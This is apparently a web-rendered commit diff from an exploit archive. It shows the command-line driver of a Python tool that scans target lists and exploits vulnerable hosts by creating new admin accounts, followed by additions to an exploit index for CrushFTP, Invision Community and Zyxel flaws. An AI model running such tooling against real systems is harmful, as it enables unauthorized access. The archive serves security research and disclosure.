# Check if at least one target specification is provided
|
||||
if not args.target and not args.file:
|
||||
logging.error("No target specified. Use --target or --file")
|
||||
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
|
||||
print(f" python {sys.argv[0]} --file example_targets.txt --check")
|
||||
return False
|
||||
|
||||
# Check if at least one action is specified
|
||||
if not args.check and not args.exploit:
|
||||
logging.error("No action specified. Use --check or --exploit")
|
||||
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
|
||||
print(f" python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
|
||||
return False
|
||||
|
||||
# If exploit action is specified, check for required parameters
|
||||
if args.exploit and (not args.new_user or not args.password):
|
||||
logging.error("Exploitation requires --new-user and --password")
|
||||
print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
def main() -> None:
|
||||
"""Main function."""
|
||||
# Parse command line arguments
|
||||
args = parse_arguments()
|
||||
|
||||
# Configure logging
|
||||
log_level = "error" if args.quiet else args.log_level
|
||||
setup_logging(log_level, args.log_file)
|
||||
|
||||
# Display banner
|
||||
if not args.quiet:
|
||||
console.print(BANNER)
|
||||
|
||||
# Validate arguments
|
||||
if not validate_args(args):
|
||||
sys.exit(1)
|
||||
|
||||
# Create target manager
|
||||
target_manager = TargetManager(args.file, args.target)
|
||||
|
||||
# Build configuration dictionary
|
||||
config = {
|
||||
"port": args.port,
|
||||
"threads": args.threads,
|
||||
"timeout": args.timeout,
|
||||
"verbose": args.verbose,
|
||||
"deep_check": args.deep_check,
|
||||
"target_user": args.target_user,
|
||||
"new_user": args.new_user,
|
||||
"password": args.password,
|
||||
"only_vulnerable": args.only_vulnerable,
|
||||
"verify_exploit": args.verify_exploit,
|
||||
"proxy": args.proxy,
|
||||
}
|
||||
|
||||
# Add custom headers if provided
|
||||
if args.custom_headers:
|
||||
try:
|
||||
config["custom_headers"] = json.loads(args.custom_headers)
|
||||
except json.JSONDecodeError:
|
||||
logging.error("Invalid JSON format for custom headers")
|
||||
sys.exit(1)
|
||||
|
||||
# Add custom user agent if provided
|
||||
if args.user_agent:
|
||||
config["user_agent"] = args.user_agent
|
||||
|
||||
# Create exploit engine
|
||||
engine = ExploitEngine(target_manager, config)
|
||||
|
||||
# Perform actions
|
||||
if args.check:
|
||||
engine.scan_targets()
|
||||
|
||||
if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
|
||||
engine.exploit_targets()
|
||||
|
||||
# Save results if output file is specified
|
||||
if args.output:
|
||||
target_manager.save_results(args.output, args.format)
|
||||
|
||||
# Display summary
|
||||
if not args.quiet:
|
||||
console.print("\n[bold green]Summary:[/bold green]")
|
||||
console.print(f"Total targets: {len(target_manager.targets)}")
|
||||
console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
|
||||
console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
main()
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[bold red]Operation cancelled by user[/bold red]")
|
||||
sys.exit(0)
|
||||
except Exception as e:
|
||||
logging.error(f"Unhandled exception: {e}")
|
||||
sys.exit(1)
|
|
@ -10609,6 +10609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
|
||||
50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
|
||||
52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,,
|
||||
52293,exploits/multiple/local/52293.bash,"Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation",2025-05-18,"Marco Ivaldi",local,multiple,,2025-05-18,2025-05-18,0,CVE-2025-1731,,,,,
|
||||
32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
|
||||
24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
|
||||
22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info
|
||||
|
@ -10865,6 +10866,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple,,2009-06-28,2016-12-30,1,OSVDB-55515;CVE-2009-2275,,,,,
|
||||
21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0787;OSVDB-9240,,,,,https://www.securityfocus.com/bid/4717/info
|
||||
21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0786;OSVDB-14438,,,,,https://www.securityfocus.com/bid/4718/info
|
||||
52295,exploits/multiple/remote/52295.py,"CrushFTP 11.3.1 - Authentication Bypass",2025-05-18,İbrahimsql,remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-31161,,,,,
|
||||
52012,exploits/multiple/remote/52012.py,"CrushFTP < 11.1.0 - Directory Traversal",2024-05-13,"Abdualhadi khalifa",remote,multiple,,2024-05-13,2024-05-13,0,,,,,,
|
||||
38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple,,2012-11-07,2015-11-05,1,CVE-2013-2261;OSVDB-95000,,,,,https://www.securityfocus.com/bid/61090/info
|
||||
38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple,,2015-11-07,2015-11-05,1,CVE-2013-4103;OSVDB-95007,,,,,https://www.securityfocus.com/bid/61093/info
|
||||
|
@ -11078,6 +11080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
43385,exploits/multiple/remote/43385.py,"Intel Active Management Technology - System Privileges",2017-05-10,nixawk,remote,multiple,16992,2017-12-21,2018-01-08,0,CVE-2017-5689,,,,,https://github.com/nixawk/labs/tree/d7e879222d058f8b87b7681342834470ab4ba536/CVE-2017-5689
|
||||
38633,exploits/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",remote,multiple,,2013-07-02,2015-11-05,1,CVE-2013-4786;OSVDB-95057,,,,,https://www.securityfocus.com/bid/61076/info
|
||||
22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple,,2003-04-05,2012-11-03,1,,,,,,https://www.securityfocus.com/bid/7291/info
|
||||
52294,exploits/multiple/remote/52294.php,"Invision Community 5.0.6 - Remote Code Execution (RCE)",2025-05-18,"Egidio Romano",remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-47916,,,,,https://karmainsecurity.com/pocs/CVE-2025-47916.php
|
||||
22662,exploits/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,remote,multiple,,2003-05-27,2012-11-13,1,OSVDB-4637,,,,,https://www.securityfocus.com/bid/7704/info
|
||||
21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info
|
||||
29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue